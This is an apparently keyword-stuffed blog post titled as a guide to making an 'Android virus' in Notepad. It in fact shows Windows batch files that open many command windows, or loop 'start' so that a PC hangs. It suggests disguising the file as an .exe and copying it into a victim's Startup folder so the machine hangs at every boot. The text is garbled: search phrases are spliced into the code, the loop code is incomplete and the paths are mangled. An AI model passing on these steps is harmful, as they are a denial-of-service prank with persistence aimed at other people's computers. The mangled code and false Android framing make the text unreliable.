How To Create Android Virus Using Notepad
First of all-this is not virus like trojan or malwares but simply a bat file tricks.We can open lots of cmd(Command Promt) windows by this trick and it also can hang pc.So be careful of using it.
- Create Android Virus With Notepad
- Notepad No Internet Virus
- Notepad Virus Harmful
- How To Create An Android Virus Using Notepad
- Virus With Notepad
Create a Fake Virus with Notepad What we’re actually doing is re-creating the same technique talked about on eicar.org’s test virus page, except we’ve got better screenshots. Open up a Notepad window, paste in the following text, and then save it. Looped Virus: Here we will gonna set loop of 'start' command.So this code will execute infinite times and PC will surely HANG! Step 1: Open 'Notepad' and copy-paste this code in it.
(This is only for educational purpose - no incident will be relate to author)
So let's start...
Simple Virus :
@echo off
start
start
start
start
start
start
start
start
start
start
Create Android Virus With Notepad
startstart
start
start
Notepad No Internet Virus
Step 2 : Save it with > anyname.bat
- Like : don't open.bat
Notepad Virus Harmful
- Here how many times we write 'start' in code - same numbers of cmd windows will open.
Looped Virus :
Here we will gonna set loop of 'start' command.So this code will execute infinite times and PC will surely HANG!
Step 1 : Open 'Notepad' and copy-paste this code in it.
@echo off
start
How To Create An Android Virus Using Notepad
- Like : loop.bat
Step 3 : When we open that .bat file - cmd windows will continuously open and soon PC will HANG! 😈
> Here anyone can edit .bat file, so its good to convert it into .exe (executable file) using Bat To Exe Converter.Virus With Notepad
Something New :
Let's do something new.What if we add this loop file to the list of startup programs in system.😂Then when someone open PC and he/she will find opening cmd windows continuously and then PC hangs😉.
So now copy that .bat file into this folder :
C:UsersUSER NAMEAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
That's it!
C:UsersUSER NAMEAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
That's it!
Note : Be caerful by adding loop file to startup list.
See also :
See also :